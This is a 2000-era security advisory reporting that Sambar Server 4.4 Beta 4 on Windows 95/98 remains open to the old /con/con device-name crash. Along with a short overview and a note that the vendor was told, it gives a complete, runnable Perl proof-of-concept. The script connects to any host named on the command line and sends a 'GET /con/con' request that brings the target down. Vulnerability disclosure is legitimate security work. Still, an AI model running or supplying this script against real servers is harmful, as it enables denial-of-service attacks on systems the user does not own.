daemon-root's security research 
Advisory Name: dae_sambar44b4
 Release Date: 10 November 2000
  Application: Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com)
     Platform: Windows 95, 98
     Severity: The server is still vulnerable for the infamous /con/con exploit
       Author: daemon-root (daemon_r00t@secureroot.com)
          Web: http://www.daemon-root.da.ru


Overview:

Sambar Server is a free, multithreaded HTTP server for Windows 95/NT. 
Its features include HTTP proxy, search engine, log analysis, security, 
server-side scripting, and DLLs. This program includes an unbuffered CGI support, 
native FTP proxy, a sacrypt encryption utility, and significantly faster 
full-text indexing, yet it's still vulnerable for the infamous /con/con exploit 
such as in the previous versions of Sambar Server.


Proof of concept code:

[dae_sambar44.pl]

# Sambar Server 4.4 Beta 4 Windows /con/con Exploit
#
# Bad Perl Code by: daemon-root 
# Website: http://www.daemon-root.da.ru
#
# This is for EDUCATION purposes ONLY! 

use IO::Socket;

  print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n";
  print "=================================================\n";
 if (not $ARGV[0]) {
  print "Usage: $0 [host]\n\n";
 exit(0);
}
sub connecthost {
 $host = IO::Socket::INET->new ( Proto => "tcp",
   PeerAddr => $ARGV[0],
   PeerPort => "80",) or die "Can't open connection to $ARGV[0] because $!\n";
 $host->autoflush(1);
}
 $exploit .= "/con/con";
  print "\nOpen connection...\n";
   &connecthost;
  print "Sending characters...\n";
  print $host "GET $exploit HTTP/1.0\n";
  print "close connection...\n";
 close $host;

[END OF dae_sambar44.pl]

Vendor status:

The vendor has been informed on 10 november 2000.
______________________________________________________________
daemon-root's security research - http://www.daemon-root.da.ru